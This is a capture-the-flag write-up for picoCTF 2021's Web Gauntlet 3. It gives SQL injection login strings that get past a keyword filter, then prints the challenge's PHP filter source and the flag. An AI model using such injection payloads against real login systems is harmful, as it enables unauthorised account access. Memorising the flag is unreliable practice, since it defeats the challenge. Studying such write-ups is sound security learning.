Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:29772/ Filter: http://mercury.picoctf.net:29772/filter.php
The challenge is the exact same as Web Gauntlet 2 but we know have a 25 total character limit for our username and passoword field entry.
Thankfully our solution for Web Gauntlet 2 is under this limit and also works for this challenge so check the writeup for that out here to get a more detailed explanation and use the same values: https://github.com/ZeroDayTea/PicoCTF-2021-Killer-Queen-Writeups/blob/main/WebExploitation/WebGauntlet2.md.
Final values for login:
username: ad'||'min
password: a' IS NOT 'b
After inputting these values for username and password we login and get the message "Congrats! You won! Check out filter.php". Reloading the filter.php file at http://mercury.picoctf.net:29772/filter.php we get the source code for the challenge along with the flag in the comments just as for Web Gauntlet 2.
<?php
session_start();
if (!isset($_SESSION["winner3"])) {
$_SESSION["winner3"] = 0;
}
$win = $_SESSION["winner3"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($win === 0) {
$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
if ($view) {
echo "Filters: ".implode(" ", $filter)."<br/>";
}
} else if ($win === 1) {
if ($view) {
highlight_file("filter.php");
}
$_SESSION["winner3"] = 0; // <- Don't refresh!
} else {
$_SESSION["winner3"] = 0;
}
// picoCTF{k3ep_1t_sh0rt_30593712914d76105748604617f4006a}
?>Note: If you successfuly ran the SQL injection but still see nothing in the filter.php file try clearing cache and then reloading or using a different browser to get the source code with flag.
picoCTF{k3ep_1t_sh0rt_30593712914d76105748604617f4006a}